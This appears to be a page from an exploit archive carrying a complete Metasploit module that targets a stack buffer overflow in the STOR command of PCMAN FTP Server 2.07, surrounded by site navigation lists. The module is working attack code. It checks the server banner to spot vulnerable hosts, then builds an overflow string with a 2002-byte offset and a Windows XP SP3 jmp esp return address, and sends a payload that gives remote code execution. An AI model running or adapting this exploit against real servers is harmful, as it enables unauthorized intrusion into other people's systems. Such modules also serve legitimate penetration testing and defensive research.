PCMAN FTP Server Buffer Overflow

PCMAN FTP Server Buffer Overflow: Posted Sep 16, 2013; Authored by Rick Flores, Polunchis | Site metasploit.com; This Metasploit module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server.; tags | exploit, overflow; SHA-256 | 92e3649883cf46261d7a290c18c45a30760946ef4d2f40d99301ed717313473c; Download | Favorite | View

PCMAN FTP Server Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp
  
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PCMAN FTP Server STOR Command Stack Overflow',
      'Description'    => %q{
            This module exploits a buffer overflow vulnerability
            found in the STOR command of the PCMAN FTP v2.07 Server
            when the "/../" parameters are also sent to the server.
      },
      'Author'         => [
            'Christian (Polunchis) Ramirez',  # Initial Discovery
            'Rick (nanotechz9l) Flores',    # Metasploit Module                             
          ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: $',
      'References'     =>
        [
          [ 'URL', 'http://www.exploit-db.com/exploits/27703/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'     => 1000,
          'BadChars'     => "\x00\xff\x0a\x0d\x20\x40",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3', 
            { 
              'Ret' => 0x7C91FCD8, # jmp esp from kernel32.dll
              'Offset' => 2002
            } 
          ],
        ],
      'DisclosureDate' => 'Jul 17 2011',
      'DefaultTarget'  => 0))
  end
  
  def check
  connect
  disconnect
  if (banner =~ /220 PCMan's FTP Server 2.0/)
    return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login
    print_status("Trying victim #{target.name}...")    
    sploit = "\x41" * 2002 + [target.ret].pack('V') + make_nops(4) + "\x83\xc4\x9c" + payload.encoded
    sploit << make_nops(4)
    sploit << payload.encoded
    send_cmd( ['STOR', '/../' + sploit], false )
    handler
    disconnect
  end
end

Top Authors In Last 30 Days

Red Hat 323 files
Ubuntu 71 files
Debian 21 files
LiquidWorm 12 files
Gentoo 8 files
Apple 6 files
Google Security Research 4 files
Spencer McIntyre 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

PCMAN FTP Server Buffer Overflow

PCMAN FTP Server Buffer Overflow

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PCMAN FTP Server Buffer Overflow

Share This

PCMAN FTP Server Buffer Overflow

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems